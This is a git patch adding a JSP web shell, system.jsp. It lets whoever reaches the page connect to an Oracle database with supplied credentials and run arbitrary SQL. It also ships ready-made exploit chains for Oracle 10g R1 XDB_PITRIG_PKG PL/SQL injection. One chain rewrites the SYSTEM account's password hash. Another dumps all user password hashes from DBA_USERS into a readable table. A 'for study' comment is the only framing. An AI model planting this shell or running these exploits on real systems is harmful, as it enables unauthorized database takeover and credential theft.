From 9563f4f2be6f4c71a6d31c67560d3b7aac4a6939 Mon Sep 17 00:00:00 2001
From: tennc <tennc@126.com>
Date: Tue, 2 Jul 2013 14:39:30 +0800
Subject: [PATCH] update drag

---
 drag/system.jsp | 609 ++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 609 insertions(+)
 create mode 100644 drag/system.jsp

diff --git a/drag/system.jsp b/drag/system.jsp
new file mode 100644
index 0000000..d0ec070
--- /dev/null
+++ b/drag/system.jsp
@@ -0,0 +1,609 @@
+<%@ page contentType="text/html;charset=gb2312"%>
+<%@ page import="java.lang.*"%>
+<%@ page import="java.sql.*"%>
+<%@ page import="java.util.*"%>
+<%@ page import="java.io.*"%>
+<%!
+/**
+	 * 
+	 * this tool only for study
+	 * you can find this everywhere
+	 */
+//test fun
+public List testconn(java.lang.String url, java.lang.String user,
+			java.lang.String password) throws java.lang.Exception {
+		Class.forName("oracle.jdbc.driver.OracleDriver").newInstance();
+		Connection conn = DriverManager.getConnection(url, user, password);
+		String sql = "SELECT * FROM DBA_TABLES WHERE TABLE_NAME not like '%$%' and num_rows>0 and rownum<10";
+		Statement stmt = conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,
+				ResultSet.CONCUR_UPDATABLE);
+		ResultSet rs = stmt.executeQuery(sql);
+		List list = new Vector();
+		list.add(new String[]{"some system tables!","good luck!"});
+		while (rs.next()) {
+			java.lang.String str[] = new java.lang.String[2];
+			str[0] = rs.getString("owner");
+			str[1] = rs.getString("table_name");
+			list.add(str);
+		}
+		
+		rs.close();
+		stmt.close();
+		conn.close();
+
+		return list;
+	}
+
+	/**getConn
+	 */
+	public Connection getConn(String url, String user, String password)
+			throws java.lang.Exception {
+
+		Class.forName("oracle.jdbc.driver.OracleDriver").newInstance();
+		return DriverManager.getConnection(url, user, password);
+	}
+
+	/**to exec the sql query.
+	 */
+	public List getSqlExecuteContext(String sql, String url, String user,
+			String password) throws java.lang.Exception {
+		Connection conn = getConn(url, user, password);
+		Statement stmt = conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,
+				ResultSet.CONCUR_UPDATABLE);
+		ResultSet rs = stmt.executeQuery(sql);
+		ResultSetMetaData rsma = rs.getMetaData();
+		int inttmp = rsma.getColumnCount();
+		List listcolum = new Vector();
+		for (int i = 0; i < inttmp; i++) {
+			listcolum.add(rsma.getColumnName(i+1));
+		}
+		
+		List list = new Vector();
+		list.add(listcolum);
+		while (rs.next()) {
+			List listRsValue = new Vector();
+			for (int i = 0; i < inttmp; i++) {
+				listRsValue.add(rs.getObject(i + 1));
+			}
+			list.add(listRsValue);
+		}
+		
+		rs.close();
+		stmt.close();
+		conn.close();
+		return list;
+	}
+
+	/**execute update,delete,proc,create and so on...
+	 */
+	public int executeUpdate(String sql, String url, String user,
+			String password) throws java.lang.Exception {
+		Connection conn = getConn(url, user, password);
+		Statement stmt = conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,
+				ResultSet.CONCUR_UPDATABLE);
+		int i = stmt.executeUpdate(sql);
+		conn.commit();
+		stmt.close();
+		conn.close();
+		return i;
+	}
+
+	/**to invoke other fun
+	 */
+	public List toFuckLZ(String str, String url, String user, String password) {
+		List list = new Vector();
+		if (str==null||str.length()<7)
+		{
+			return list;
+		}
+		if (str.substring(0, 6).toLowerCase().equals("select")) {
+			try {
+				list = getSqlExecuteContext(str, url, user, password);
+			} catch (Exception ex) {
+				list.add(ex.getMessage());
+			}
+		} else {
+			try {
+				list.add("success to yingxiang ji lu "
+						+ executeUpdate(str, url, user, password) + " tiao !");
+			} catch (Exception ex) {
+				list.add(ex.getMessage());
+			}
+		}
+		return list;
+	}%>
+<%
+	//globol
+	String action = "";
+	action = request.getParameter("action");
+	String oracle_config_db_username = "";
+	String oracle_config_db_password = "";
+	String oracle_config_db_ip = "";
+	String oracle_config_db_sid = "";
+	String oracle_config_db_port = "";
+	String oracle_config_db_url = "";
+
+	if (action == null) {
+		//config
+%>
+<script>
+	function fun_xiangxicanshu()
+	{
+
+		var xiangxidiv = document.getElementById('xiangxilianjie');
+        xiangxidiv.style.display="block";
+		var chuancandiv = document.getElementById('chuanurlfangshi');
+		chuancandiv.style.display="none";
+		var action = document.getElementById('action');
+		action.value='db_config_xiangxi';
+
+	}
+	function fun_chuanurl()
+	{
+		var xiangxidiv = document.getElementById('xiangxilianjie');
+		xiangxidiv.style.display="none";
+		var chuancandiv = document.getElementById('chuanurlfangshi');
+		chuancandiv.style.display="block";
+		var action = document.getElementById('action');
+		action.value='db_config_url';
+	}
+
+</script>
+oracle execute...
+<br />
+<input name="xiangxicanshu" type="radio" value=""
+	onclick="fun_xiangxicanshu()" />
+all Parameter
+<input name="xiangxicanshu" type="radio" value=""
+	onclick="fun_chuanurl();" />
+url ,dbuser,dbname
+
+<form id="form1" name="form1" method="post" action="system.jsp">
+	<input type="hidden" name="action" id="action" />
+	<div id="xiangxilianjie" style="display:none">
+		<table width="362" border="1">
+			<tr>
+				<td width="123">
+					oracle IP
+				</td>
+				<td width="223">
+					<label>
+						<input type="text" name="oracle_config_db_ip" />
+					</label>
+				</td>
+			</tr>
+			<tr>
+				<td>
+					db_username
+				</td>
+				<td>
+					<input type="text" name="oracle_config_db_username" />
+				</td>
+			</tr>
+			<tr>
+				<td>
+					db_password
+				</td>
+				<td>
+					<input type="password" name="oracle_config_db_password" />
+				</td>
+			</tr>
+			<tr>
+				<td>
+					SID
+				</td>
+				<td>
+					<input type="text" name="oracle_config_db_sid" />
+				</td>
+			</tr>
+			<tr>
+				<td>
+					port
+				</td>
+				<td>
+					<input type="text" name="oracle_config_db_port" />
+				</td>
+			</tr>
+			<tr>
+				<td colspan="2">
+					<label>
+						go
+						<input type="submit" name="Submit" value="login" />
+					</label>
+				</td>
+			</tr>
+		</table>
+	</div>
+	<div id="chuanurlfangshi" style="display:none">
+		<table width="774" border="1">
+			<tr>
+				<td width="92">
+					url:
+				</td>
+				<td width="666">
+					<label>
+						<textarea name="oracle_config_db_url" cols="100" rows="5"></textarea>
+					</label>
+				</td>
+			</tr>
+			<tr>
+				<td>
+					db_username
+				</td>
+				<td>
+					<input type="text" name="oracle_config_db_username1" />
+				</td>
+			</tr>
+			<tr>
+				<td>
+					password
+				</td>
+				<td>
+					<input type="password" name="oracle_config_db_password1" />
+				</td>
+			</tr>
+			<tr>
+				<td colspan="2">
+					<label>
+						go
+						<input type="submit" name="Submit2" value="login" />
+					</label>
+				</td>
+			</tr>
+		</table>
+	</div>
+</form>
+<%
+		} else if (action.equals("db_config_xiangxi")) {
+		oracle_config_db_username = request
+		.getParameter("oracle_config_db_username");
+		oracle_config_db_password = request
+		.getParameter("oracle_config_db_password");
+		oracle_config_db_ip = request
+		.getParameter("oracle_config_db_ip");
+		oracle_config_db_sid = request
+		.getParameter("oracle_config_db_sid");
+		oracle_config_db_port = request
+		.getParameter("oracle_config_db_port");
+		String url = null;
+
+		url = "jdbc:oracle:thin:@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST="
+		+ oracle_config_db_ip
+		+ ")(PORT="
+		+ oracle_config_db_port
+		+ ")))(CONNECT_DATA=(SERVER=DEDICATED)(SERVICE_NAME="
+		+ oracle_config_db_sid + ")))";
+
+		List list = new Vector();
+		list.add(new String[]{"some system tables!","good luck!"});
+		//try {
+		//	list = testconn(url, oracle_config_db_username,
+		//	oracle_config_db_password);
+		//} catch (java.lang.Exception ex) {
+		//}
+		request.getSession().setAttribute("url_dbconn", url);
+		request.getSession().setAttribute("db_user",
+		oracle_config_db_username);
+		request.getSession().setAttribute("db_password",
+		oracle_config_db_password);
+%>
+ORACLE table list ??
+<br />
+<b>username--tablename</b>
+<a href="<%=request.getRequestURL()%>?action=show">click me to con</a>
+<br />
+<textarea name="jieguo" cols="100" rows="30">
+        <%
+        			for (int i = 0; i < list.size(); i++) {
+        			java.lang.String str[] = (String[]) list.get(i);
+        %>
+                <%=str[0]%> -- <%=str[1]%>
+            <%
+            }
+            %>
+						</textarea>
+<%
+		} else if (action.equals("db_config_url")) {
+
+		oracle_config_db_url = request
+		.getParameter("oracle_config_db_url");
+		oracle_config_db_username = request
+		.getParameter("oracle_config_db_username1");
+		oracle_config_db_password = request
+		.getParameter("oracle_config_db_password1");
+
+		List list = new Vector();
+		//try {
+		//	list = testconn(oracle_config_db_url,
+		//	oracle_config_db_username,
+		//	oracle_config_db_password);
+		//} catch (java.lang.Exception e) {
+		//}
+		list.add(new String[]{"some system tables!","good luck!"});
+		request.getSession().setAttribute("url_dbconn",
+		oracle_config_db_url);
+		request.getSession().setAttribute("db_user",
+		oracle_config_db_username);
+		request.getSession().setAttribute("db_password",
+		oracle_config_db_password);
+%>
+ORACLE table list ??
+<br />
+<b>username--tablename</b>
+<a href="<%=request.getRequestURL()%>?action=show">click me to con</a>
+<br />
+<textarea name="jieguo" cols="100" rows="30">
+        <%
+        			for (int i = 0; i < list.size(); i++) {
+        			java.lang.String str[] = (String[]) list.get(i);
+        %>
+                <%=str[0]%> -- <%=str[1]%>
+            <%
+            }
+            %>
+						</textarea>
+<%
+} else if (action.equals("show")) {
+%>
+<script language="javascript">
+			//copy from sohu...
+			function GetO(){
+				    var ajax=false;
+				    try {
+				    	ajax = new ActiveXObject("Msxml2.XMLHTTP");
+				    } catch (e) {
+				   	 	try {
+				    		ajax = new ActiveXObject("Microsoft.XMLHTTP");
+				    	} catch (E) {
+				    		ajax = false;
+				    	}
+				    }
+				    if (!ajax && typeof XMLHttpRequest!='undefined') {
+				    	ajax = new XMLHttpRequest();
+				    }
+				    return ajax;
+				}
+				//copy from sohu...
+				function getMyHTML(serverPage) {
+					var ajax = GetO();
+				    var requestDiv = document.getElementById('requestDiv');
+				    
+				    ajax.open("POST",serverPage,true);
+		
+				    ajax.onreadystatechange = function() {
+				        if (ajax.readyState == 4 && ajax.status == 200) {
+							var strvar = ajax.responseText;
+							requestDiv.innerHTML += strvar;
+							//requestDiv.innerHTML += strvar;
+				        }
+				    }
+					ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
+					var queryString = createQueryString();
+				    ajax.send(queryString);
+				}
+				function createQueryString()
+				{
+					 var sqlrequest=document.getElementById("sqlrequest").innerText;
+					 
+					 var time = Math.random();
+					 var queryString="sqlrequest=" + sqlrequest + "&time=" + time;
+					 return queryString;
+				}
+				function requestAjax()
+				{
+					getMyHTML("<%=request.getRequestURL()%>?action=todoExeSql","sqlrequest");
+				}
+				function clearResult()
+				{
+					document.getElementById('requestDiv').innerHTML='';
+				}
+				function selectThemSql()
+				{
+					var iniselect = document.getElementById('emSql').value;
+					var sqlrequest = document.getElementById('sqlrequest');
+					
+					//change pass desc
+					if (iniselect=='1')
+					{
+						var sqlstr = "";
+						sqlstr+="Oracle 10g R1 xdb.xdb_pitrig_pkg PLSQL Injection (change sys password)"+"\r\n";
+						sqlstr+="step 1 to create proc"+"\r\n";
+						sqlstr+="step 2 to exec "+"\r\n";
+						sqlrequest.innerText = sqlstr;
+						sqlrequest.value = sqlstr;
+					}
+					//change pass step 1
+					if (iniselect=='2')
+					{
+						var sqlstr = "";
+						sqlstr+="CREATE OR REPLACE FUNCTION CHANGEPASS return varchar2"+"\r\n";
+						sqlstr+="authid current_user as"+"\r\n";
+						sqlstr+="pragma autonomous_transaction;"+"\r\n";
+						sqlstr+="BEGIN"+"\r\n";
+						sqlstr+="EXECUTE IMMEDIATE 'update sys.user$ set password=''EC7637CC2C2BOADC'' where name=''SYSTEM''';"+"\r\n";
+						sqlstr+="COMMIT;"+"\r\n";
+						sqlstr+="RETURN '';"+"\r\n";
+						sqlstr+="END;"+"\r\n";
+						sqlstr+="/"+"\r\n";
+						sqlrequest.innerText = sqlstr;
+						sqlrequest.value = sqlstr;
+					}
+					//change pass step 2
+					if (iniselect=='3')
+					{
+						var sqlstr = "";
+						sqlstr+="EXEC XDB.XDB_PITRIG_PKG.PITRIG_DROP('SCOTT\".\"SH2KERR\" WHERE 1=SCOTT.CHANGEPASS()--','HELLO IDS IT IS EXPLOIT :)');";
+						sqlrequest.innerText = sqlstr;
+						sqlrequest.value = sqlstr;
+					}
+					
+					//get password hash
+					if (iniselect=='4')
+					{
+						var sqlstr = "";
+						sqlstr+="Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE exp (get password hash)"+"\r\n";
+						sqlstr+="step 1 to create a table for save result"+"\r\n";
+						sqlstr+="step 2 to create a proc "+"\r\n";
+						sqlstr+="step 3 to exec proc (exp)"+"\r\n";
+						sqlstr+="step 4 to select result"+"\r\n";
+						sqlstr+="ps: don't forget to delete the table."+"\r\n";
+						sqlrequest.innerText = sqlstr;
+						sqlrequest.value = sqlstr;
+					}
+					if (iniselect=='5')
+					{
+						var sqlstr = "";
+						sqlstr+="CREATE TABLE SH2KERR(id NUMBER,name VARCHAR(20),password VARCHAR(16));";
+						sqlrequest.innerText = sqlstr;
+						sqlrequest.value = sqlstr;
+					}
+					if (iniselect=='6')
+					{
+						var sqlstr = "";
+						sqlstr+="CREATE OR REPLACE FUNCTION SHOWPASS return varchar2"+"\r\n";
+						sqlstr+="authid current_user as"+"\r\n";
+						sqlstr+="pragma autonomous_transaction;"+"\r\n";
+						sqlstr+="BEGIN"+"\r\n";
+						sqlstr+="EXECUTE IMMEDIATE 'INSERT INTO SCOTT.sh2kerr(id,name,password) SELECT user_id,username,password FROM DBA_USERS';"+"\r\n";
+						sqlstr+="COMMIT;"+"\r\n";
+						sqlstr+="RETURN '';"+"\r\n";
+						sqlstr+="END;"+"\r\n";
+						sqlstr+="/"+"\r\n";
+						sqlrequest.innerText = sqlstr;
+						sqlrequest.value = sqlstr;
+					}
+					if (iniselect=='7')
+					{
+						var sqlstr = "";
+						sqlstr+="EXEC XDB.XDB_PITRIG_PKG.PITRIG_TRUNCATE('SCOTT&quot;.&quot;SH2KERR&quot; WHERE 1=SCOTT.SHOWPASS()--','HELLO IDS IT IS EXPLOIT :)');"+"\r\n";
+						sqlrequest.innerText = sqlstr;
+						sqlrequest.value = sqlstr;
+					}
+					if (iniselect=='8')
+					{
+						var sqlstr = "";
+						sqlstr+="select * from sh2kerr;";
+						sqlrequest.innerText = sqlstr;
+						sqlrequest.value = sqlstr;
+					}
+					if (iniselect=='9')
+					{
+						var sqlstr = "";
+						sqlstr+="if fun , i will dev a xml version..";
+						sqlrequest.innerText = sqlstr;
+						sqlrequest.value = sqlstr;
+					}
+					
+				}
+		</script>
+<table width="782" height="394" border="0" align="center">
+	<tr>
+		<td width="49" height="27">
+			&nbsp;
+		</td>
+		<td width="297">
+			<br/>
+			select the em 
+			<select onchange="selectThemSql();" id="emSql">
+				<option value="">select</option>
+				<option value="1">	change sys pass 12345 Exp</option>
+				<option value="2">	----------step 1 (create proc)</option>
+				<option value="3">	----------step 2 (exec proc)</option>
+				<option value="4">	get password Hashes</option>
+				<option value="5">	----------step 1 (create table)</option>
+				<option value="6">	----------step 2 (create proc)</option>
+				<option value="7">	----------step 3 (exec proc)</option>
+				<option value="8">	----------step 4 (select)</option>
+				<option value="9">	and so on...</option>
+			</select>
+		</td>
+	</tr>
+	<tr>
+		<td height="76">
+			sql:
+		</td>
+		<td>
+			<label>
+				<textarea name="sqlrequest" rows="5" cols="80" id="sqlrequest"></textarea><br>
+				<input type="button" name="Submit" onclick="requestAjax();"
+					value="gogogogogog" />
+					<input type="button" name="Submit" onclick="clearResult();"
+					value="clearResult" /><br/>
+			</label>
+		</td>
+	</tr>
+
+	<tr>
+		<td>
+			result:
+		</td>
+		<td>
+			<label>
+				<span id="requestDiv" name="requestDiv"></span>
+			</label>
+		</td>
+	</tr>
+
+</table>
+<%
+		} else if (action.equals("todoExeSql")) {
+		String url = null;
+		if (request.getSession().getAttribute("url_dbconn") != null) {
+			url = request.getSession().getAttribute("url_dbconn")
+			.toString();
+		}
+
+		String user = null;
+		if (request.getSession().getAttribute("db_user") != null) {
+			user = request.getSession().getAttribute("db_user")
+			.toString();
+		}
+
+		String password = null;
+		if (request.getSession().getAttribute("db_password") != null) {
+			password = request.getSession().getAttribute("db_password")
+			.toString();
+		}
+
+		String strsql = null;
+		if (request.getParameter("sqlrequest") != null) {
+			strsql = request.getParameter("sqlrequest").toString();
+		}
+		String strResponse ="<b>execute :\"" + strsql + "\"</b><table border=1>";
+		List listtmp = toFuckLZ(strsql, url, user, password);
+
+		for (int i = 0; i < listtmp.size(); i++) {
+			List listwaiceng = new Vector();
+			try {
+				listwaiceng = (Vector)listtmp.get(i);
+			} catch (Exception ex) {
+				strResponse += "error! to check you sql! "+listtmp;
+				break;
+			}
+			if (listwaiceng == null) {
+				strResponse += "<br/>";
+				continue;
+			}
+			strResponse += "<tr>";
+			for (int j = 0; j < listwaiceng.size(); j++) {
+				try{
+					strResponse += "<td>"+listwaiceng.get(j)+"</td>";
+				}catch(Exception ex){
+					strResponse += "error! to check you sql! "+listtmp;
+					break;
+				}
+			}
+			strResponse += "</tr>";
+		}
+		strResponse += "</table>";
+		try{
+		
+			PrintWriter output = response.getWriter();
+			output.println(strResponse);
+			output.flush();
+
+			output.close();
+			}catch(Exception ex){
+		}
+	}
+%>